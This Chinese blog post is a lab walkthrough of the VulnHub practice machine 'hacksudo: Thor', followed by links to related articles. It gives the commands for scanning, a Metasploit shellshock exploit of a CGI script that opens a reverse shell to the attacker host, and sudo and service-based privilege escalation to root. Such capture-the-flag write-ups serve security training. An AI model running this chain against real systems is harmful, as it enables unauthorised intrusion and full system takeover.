VulnHUb日记(十):Hacksudo:Thor

最新推荐文章于 2024-07-26 16:35:52 发布
最新推荐文章于 2024-07-26 16:35:52 发布
阅读量1.2k 收藏
点赞数
分类专栏: VlunHub日记 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/120509575
版权

靶机介绍

虚拟机链接:hacksudo: Thor ~ VulnHub

参考博客:Hacksudo Thor Walkthrough - Vulnhub - Security - NepCodeX

开始练习

本机ip:192.168.56.102

虚拟机ip:192.168.56.124

使用netdiscover寻找ip地址

netdiscover -r 192.168.56.0/24

 使用nmap扫描开放端口

nmap -A 192.168.56.124

 开放21,22,80端口,查看80端口

 使用dirsearch枚举目录

dirsearch  -e txt,bak,zip,img,jpg,php,html,js -u http://192.168.56.124

逐个查看,在news.php中发现提示cig-bin,根据博客提示这里有可能有漏洞可以利用,于是枚举该目录下文件,发现shell.sh

 

dirsearch http://192.168.56.124/cgi-bin

使用msf工具,成功获得shell

msfconsole
search shellshock
use 1
show options
set RHOSTS 192.168.56.124
set TARGETURI /cgi-bin/shell.sh
set LHOST 192.168.56.102
set LPORT 4396
run
shell

 

 发现可以用thor的用户免密root执行hammer.sh 

sudo -l

id

 

 该shell文件可以执行输入的指令,于是使用“bash"获取thor的shell并优化

sudo -u thor /home/thor/./hammer.sh
bash
SHELL=/bin/bash script -q /dev/null ## 优化

sudo -l

 可以直接利用该指令进行service提权

参考链接:service | GTFOBins

sudo service ../../bin/bash

成功提权

Dawn_Xiiii
关注
专栏目录
thor:Thor是我们公司的机器人
07-18
您可以通过运行以下命令在本地启动 Thor: % bin/hubot 你会看到一些关于你的脚本来自哪里的启动输出和一个提示: [Sun, 04 Dec 2011 18:41:11 GMT] INFO Loading adapter shell [Sun, 04 Dec 2011 18:41:11 ...
hacksudo-ThorVulnhub
wcl20010的博客
05-26 762
靶机地址:hacksudo: Thor ~ VulnHub 利用的技术 shellshock破壳漏洞<–cgi-bin–> GTFOBins提权 github开源源码泄露 什么是破壳漏洞? bash环境变量 var="hello world" //一个简单的环境变量 =前后不能有空格 使用它输入命令: echo $var //输出就是你定义的内容 如果此时再输入bash 那么得到的就是bash的子进程 -》var就不能访问了:echo $var 子进程可以访问
Vulnhub项目:HACKSUDO: THOR
Ays.Ie的博客
06-03 962
Vulnhub项目:HACKSUDO: THOR
vulnhub-->hacksudo-Thor靶机详细思路
woshicainiao666的博客
02-11 942
Shellshock漏洞的原因是Bash解释器在处理特定的环境变量时存在一个安全漏洞,攻击者可以通过构造恶意的环境变量来执行任意的Shell命令。破壳漏洞(Shellshock)是指一个影响Unix和Linux操作系统的严重安全漏洞,它影响了Bash命令解释器。该漏洞使攻击者能够在受影响的系统上执行任意代码,从而可能导致系统被入侵。sudo -l 发现可执行文件/home/thor/./hammer.sh,执行,发现输入的命令,会以thor用户执行,所以执行bash,以Thor用户新开一个bash环境。
靶机渗透练习96-hacksudoThor
hirak0的博客
05-09 1733
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-thor,733/ Description Box created by vishal Waghmare This box should be easy to medium . This machine was created for the InfoSec Prep Discord Server ( https://discord.gg/kDyAKtJs ) Website (https://hacksud
Vulnhub靶机:hacksudo-Thor
qq_48904485的博客
02-09 1065
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hacksudo-Thor(10.0.2.49)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hacksudo/hacksudoThor.zip。
thor:WebSocket雷神
04-01
雷神ThorWebSocket基准测试/负载生成器。 HTTP服务器有很多基准测试工具。 您有AB,攻城,WRK等更多内容。 但是所有这些工具仅适用于普通ol HTTP,并且不支持WebSockets-即使它们不适合,因为它们将测试短时间运行...
thor:雷神
03-18
** thor **是一个C ++帮助程序库,为深度学习提供了巨大的实用程序,算法和可视化功能。我们建议从github来源安装,因为我们会大量更新新的API。但是* thor *将始终与旧版本兼容,它安全可靠地集成到您的项目中并...
thor:泰坦引擎
03-31
"thor:泰坦引擎" 是一个以"泰坦"为代号的高性能计算平台或软件引擎,可能专用于处理大规模数据处理、图形渲染、物理模拟等任务。由于提供的信息有限,我们将根据常见的情况和假设来探讨这个主题。 在IT行业中,引擎...
Thor:DIY 3D可打印机械臂
05-28
Thor是具有六个自由度的开源可打印机械臂。 其配置(偏航-偏航-偏航-偏航-偏航)与当前市场上大多数机械手机器人所使用的配置相同。 在直立位置,雷神(Thor)约为625毫米,它可以提起重达750克的物体。 该项目于...
hack_fish_sudo:这是我尝试过的一种方法,可以让您借助别名在鱼控制台中获取sudo密码。 该脚本是用python制作的。 PS我不是一个确切的PHD所有者,所以不要盯着我的代码太久,因为我知道这很糟糕
03-26
hack_fish_sudo 这是我尝试过的一种方法,可以让您借助别名在鱼控制台中获取sudo密码。 该脚本是用python制作的。 PS我不是一个确切的PHD所有者,所以不要盯着我的代码太久,因为我知道这很糟糕
Hacksudo-Thor靶机--详细教学
qq_41245301的博客
03-08 788
script http-shellshock: http-shellshock 是一个用于检测 Shellshock漏洞的脚本。拿到一个meterpreter,我们发现我们拿到了web服务的权限我们要想办法拿到root的权限。通过nmap扫描和浏览器插件,我们可以发现服务器软件是Apache Http Server。的目录,我可以可以尝试对这个文件夹进行扫描看看有没有漏洞。这个网站通过浏览器的url可以发现是一个php语言开发的。dirb [字典(可以选)] [操作]
Hacksudo Thor靶机详细测试过程与编程学习
WqSmalltalk的博客
09-22 57
本文将详细介绍Hacksudo Thor靶机的测试过程,并结合编程学习的角度,展示如何利用各种工具和技术来解决其中的挑战。本文将详细介绍Hacksudo Thor靶机的测试过程,并结合编程学习的角度,展示如何利用各种工具和技术来解决其中的挑战。在渗透测试过程中,如果我们成功获得了系统的低权限访问,接下来的目标是提升权限以获取更高的特权。信息收集是渗透测试的第一阶段,目的是收集有关目标系统的信息。在渗透测试过程中,如果我们成功获得了系统的低权限访问,接下来的目标是提升权限以获取更高的特权。
9、hacksudo---Thor
最新发布
DamnVanish的博客
07-26 1011
看到有这么多的功能点,首先是有一个添加news的地方,想着是不是可以添加webshell到这个news页面中,然后尝试了一下发现了都转义了并不可以,然后尝试是否存在SQL注入的漏洞,发现存在宽字节注入,好吧是我搞错了,这里只是他的长度太长了l类型不一致导致报错,并没有宽字节注入。然后使用sudo -u thorthor的身份去执行这个hammer.sh文件,要输入两个值,第一个值是任意的密码,第二个值在多次尝试后发现是执行命令的地方,于是可以直接将bash弹出,并且提升为交互式shell。
vulnhubhacksudo:Thor
weixin_54431413的博客
05-24 1027
前期:主机发现端口扫描,服务版本探测, 中期:信息收集,通过源码发现管理员默认密码,发现逻辑漏洞,sql注入等 后期:通过cgi程序利用破壳漏洞成功突破边界,最后利用一些命令配置不当实现成功提权。 此篇最重要的一点就是破壳漏洞和系统逻辑漏洞, 要迟到了,上课去了
VnlnHub hacksudo-Thor
weixin_45682839的博客
10-08 544
涉及知识包括:端口服务探测、敏感目录收集、后台弱口令、SQL注入、逻辑漏洞、破壳漏洞、linux本地提权等。
vulnhub靶场-hacksudo - Thor
qq_42947816的博客
06-30 1120
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Vulnhub_HACKSUDO: THOR
qq_45434762的博客
09-04 799
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
Thor登录器新版本发布:自定义皮肤与自动更新功能
资源摘要信息:"Thor_Patcher[3.0Alpha.2]_登录器_thor_自定义_自动更新_" 在当前的IT行业中,Thor_Patcher[3.0Alpha.2]代表的是一种具备自动更新功能和自定义皮肤设置的登录器软件。以下是从标题、描述、标签以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值